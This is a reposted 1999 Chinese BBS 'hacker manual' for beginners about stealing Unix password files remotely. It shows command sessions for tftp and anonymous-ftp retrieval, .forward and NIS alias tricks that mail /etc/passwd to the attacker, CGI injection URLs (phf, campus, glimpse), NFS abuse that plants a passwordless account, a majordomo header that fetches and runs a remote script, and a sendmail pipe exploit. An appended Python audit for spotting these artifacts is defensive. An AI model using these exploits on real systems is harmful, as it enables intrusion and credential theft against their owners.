
samsa hacker manual 2

samsa hacker manual, suitable for beginners (2)
Posted by: hacktxt
Posted at: 23 January 2000, 19:41:57
(From 202.96.189.17)
From: HotFox.bbs@bbs.whnet.edu.cn (No NATO or dogs allowed), Board: Internet
Subject: samsa hacker manual: taking things from afar
Origin: Wuhan Baiyun Huanghe BBS (Tue Jun 1 16:53:30 1999)
Relay path: argo!news.zsu.edu.cn!whunews!whbbs
[The following text is reposted from the Encrypt board]
[Originally posted by acat.bbs@bbs.whu.edu.cn]
※ [This article was reposted from the SMTH_comp board]
From: samsa (a shramana ~ shunning ambition, devoted only to writing), Board: Hacker
Subject: samsa hacker manual: taking things from afar
Time: BBS Shuimu Tsinghua (Mon May 24 13:41:47 1999)
Author: [samsa]
II. Striking the ox across the mountain (remote attacks)
1) Taking things from afar: obtaining passwd
1.1) tftp
# tftp numen
tftp> get /etc/passwd
Error code 2: Access violation
tftp> get /etc/shadow
Error code 2: Access violation
tftp> quit
(samsa: nothing gained, but...)
# tftp sun8
tftp> get /etc/passwd
Received 965 bytes in 0.1 seconds
tftp> get /etc/shadow
Error code 2: Access violation
(samsa: success!!! ;-)
# cat passwd
root:x:0:0:Super-User:/:/bin/ksh
daemon:x:1:1::/:
bin:x:2:2::/usr/bin:
sys:x:3:3::/:/bin/sh
adm:x:4:4:Admin:/var/adm:
lp:x:71:8:Line Printer Admin:/usr/spool/lp:
smtp:x:0:0:Mail Daemon User:/:
uucp:x:5:5:uucp Admin:/usr/lib/uucp:
nuucp:x:9:9:uucp Admin:/var/spool/uucppublic:/usr/lib/uucp/uucico
listen:x:37:4:Network Admin:/usr/net/nls:
nobody:x:60001:60001:Nobody:/:
noaccess:x:60002:60002:No Access User:/:
ylx:x:10007:10::/users/ylx:/bin/sh
wzhou:x:10020:10::/users/wzhou:/bin/sh
wzhang:x:10101:4:Walt Whiteman:/users/wzhang:/sbin/sh
(samsa: a pity it is shadowed :-/)
1.2) Anonymous ftp
1.2.1) Getting it directly
# ftp sun8
Connected to sun8.
220 sun8 FTP server (UNIX(r) System V Release 4.0) ready.
Name (sun8:root): anonymous
331 Guest login ok, send ident as password.
Password:
(samsa: your e-mail address, fake of course :->)
230 Guest login ok, access restrictions apply.
ftp> ls
200 PORT command successful.
150 ASCII data connection for /bin/ls (192.168.0.198,34243) (0 bytes).
bin
dev
etc
incoming
pub
usr
226 ASCII Transfer complete.
35 bytes received in 0.85 seconds (0.04 Kbytes/s)
ftp> cd etc
250 CWD command successful.
ftp> ls
200 PORT command successful.
150 ASCII data connection for /bin/ls (192.168.0.198,34244) (0 bytes).
group
passwd
226 ASCII Transfer complete.
15 bytes received in 0.083 seconds (0.18 Kbytes/s)
ftp> get passwd
200 PORT command successful.
150 ASCII data connection for passwd (192.168.0.198,34245) (223 bytes).
226 ASCII Transfer complete.
local: passwd remote: passwd
231 bytes received in 0.038 seconds (5.98 Kbytes/s)
# cat passwd
root:x:0:0:Super-User:/:/bin/ksh
daemon:x:1:1::/:
bin:x:2:2::/usr/bin:
sys:x:3:3::/:/bin/sh
adm:x:4:4:Admin:/var/adm:
uucp:x:5:5:uucp Admin:/usr/lib/uucp:
nobody:x:60001:60001:Nobody:/:
ftp:x:210:12::/export/ftp:/bin/false
(samsa: as expected! Too few fools leave the complete passwd in the anonymous ftp directory)
1.2.2) The ftp home directory is writable
# cat forward_sucker_file
-| /bin/cat /etc/passwd|sed 's/^/ /'|/bin/mail me@my.e-mail.addr-
# ftp victim.com
Connected to victim.com
220 victim FTP server ready.
Name (victim.com:zen): ftp
331 Guest login ok, send ident as password.
Password:[your e-mail address:forged]
230 Guest login ok, access restrictions apply.
ftp> put forward_sucker_file .forward
43 bytes sent in 0.0015 seconds (28 Kbytes/s)
ftp> quit
# echo test | mail ftp@victim.com
(samsa: wait for the passwd file to arrive by mail...)
1.3) WWW
The famous big cgi bugs
1.3.1) phf
http://silly.com/cgi-bin/nph-test-cgi?*
http://silly.com/cgi-bin/phf?Qalias=x%0aless%20/etc/passwd
1.3.2) campus
http://silly.edu/cgi-bin/campus?%0a/bin/cat%0a/etc/passwd
1.3.3) glimpse
http://silly.com/cgi-bin/aglimpse/80|IFS=5;CMD=5mail5me\@my.e-mail.
addr\
(samsa: the line was too long, so I folded it; that's fine, right? ;-)
1.4) nfs
1.4.1) If /etc itself is exported, nothing more needs saying
1.4.2) If some user's home directory is exported
# showmount -e numen
export list for numen:
/space/users/lpf sun9
/space/users/zw (everyone)
# mount -F nfs numen:/space/users/zw /mnt
# cd /mnt
# ls -ld .
drwxr-xr-x 6 1005 staff 2560 1999 5月 11 .
# echo zw:x:1005:1:temporary break-in account:/:/bin/sh >> /etc/passwd
# echo zw::::::::: >> /etc/shadow
# su zw
$ cat >.forward
-| /bin/cat /etc/passwd|sed 's/^/ /'|/bin/mail me@my.e-mail.addr-
^D
# echo test | mail zw@numen
(samsa: wait for your mail....)
1.5) sniffer
Exploit the broadcast nature of ethernet to eavesdrop on the IP packets passing over the network and so obtain passwords.
For the principles and technical details of sniffers, see [samsa 1999].
(samsa: not much fun; it feels like ``winning without honour''...)
1.6) NIS
1.6.1) Guess the domain name, then ypcat (or, for NIS+, niscat) yields passwd (even shadow)
1.6.2) If you control the NIS server, you can create a mail alias
nis-master # echo 'foo: -| mail me@my.e-mail.addr' > /etc/aliases
nis-master # cd /var/yp
nis-master # make aliases
nis-master # echo test | mail -v foo@victim.com
1.7) e-mail
e.g. exploiting the majordomo (ver. 1.94.3) vulnerability
Reply-to: a~.`/usr/bin/rcp\${IFS}me@hacker.home.edu:script\${IFS}/tmp
/script;;source\${IFS}/tmp/script`.q~a/ad=cucu/c=scapegoat\\\@his.e-mail
# cat script
/bin/cat /etc/passwd|sed 's/^/ /'|/bin/mail me@my.e-mail.addr
#
1.8) sendmail
Exploiting the sendmail 5.55 vulnerability:
# telnet victim.com 25
Trying xxx.xxx.xxx.xxx...
Connected to victim.com
Escape character is '^]'.
220 victim.com Sendmail 5.55 ready at Saturday, 6 Nov 93 18:04
mail from: -|/bin/mail me@my.e-mail.addr
250 -|/bin/mail me@my.e-mail.addr
rcpt to: nosuchuser
550 nosuchuser... User unknown
data
354 Enter mail, end with "." on a line by itself
..
250 Mail accepted
quit
Connection closed by foreign host.
(samsa:wait...)
--
"Though florid, it lacks natural charm; merely striking, it has no deeper meaning. ... Only because its literary form
had not been tried by others can it be called peerless."
—— Lu Xun, A Brief History of Chinese Fiction
※ Source: BBS Shuimu Tsinghua bbs.net.tsinghua.edu.cn · [FROM: argo.zsu.edu.cn]
--
※ Reposted via: Wuhan Baiyun Huanghe BBS bbs.whnet.edu.cn · [FROM: 202.114.16.159]
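As an added example from the defender's side (not part of samsa's post), a small Python audit of the artifacts the post relies on or leaves behind: UID-0 accounts other than root in passwd (the sun8 dump carries one, smtp), empty hash fields in shadow, NFS exports that showmount -e reports as open to (everyone), and .forward or aliases entries that pipe mail into a command. The sample inputs are constructed from the dumps in the post; the root shadow hash is a placeholder.

```python
import re

# Constructed sample input, taken from the dumps in the post; the root hash is a placeholder.
PASSWD = """root:x:0:0:Super-User:/:/bin/ksh
daemon:x:1:1::/:
smtp:x:0:0:Mail Daemon User:/:
nobody:x:60001:60001:Nobody:/:
"""
SHADOW = """root:PLACEHOLDER_HASH:10000::::::
zw:::::::::
"""
SHOWMOUNT = """export list for numen:
/space/users/lpf sun9
/space/users/zw (everyone)
"""
MAIL_ENTRIES = """-| /bin/cat /etc/passwd|sed 's/^/ /'|/bin/mail me@my.e-mail.addr
foo: -| mail me@my.e-mail.addr
postmaster: root
"""

def audit_passwd(text: str) -> list[str]:
    """Flag UID-0 accounts other than root (the sun8 dump has one: smtp)."""
    out = []
    for line in text.splitlines():
        f = line.split(":")
        if len(f) >= 7 and f[2] == "0" and f[0] != "root":
            out.append(f"passwd: {f[0]} has UID 0")
    return out

def audit_shadow(text: str) -> list[str]:
    """Flag shadow entries whose hash field is empty, i.e. login without a password."""
    return [f"shadow: {l.split(':')[0]} has no password"
            for l in text.splitlines() if l.count(":") >= 8 and l.split(":")[1] == ""]

def audit_exports(text: str) -> list[str]:
    """Flag NFS exports that showmount -e reports as open to (everyone)."""
    return [f"nfs: {l.split()[0]} exported to everyone"
            for l in text.splitlines() if "(everyone)" in l]

def audit_mail_pipes(text: str) -> list[str]:
    """Flag .forward lines and aliases entries that pipe mail into a command."""
    pipe = re.compile(r"^\s*(\S+:\s*)?-?\|")
    return [f"mail: pipe to command: {l.strip()}"
            for l in text.splitlines() if pipe.match(l)]

def run_audit() -> list[str]:
    """Run every check over the constructed samples and return all findings."""
    return (audit_passwd(PASSWD) + audit_shadow(SHADOW)
            + audit_exports(SHOWMOUNT) + audit_mail_pipes(MAIL_ENTRIES))
```

On a live host the same functions take the contents of /etc/passwd, /etc/shadow, the output of showmount -e, and each user's .forward plus /etc/aliases.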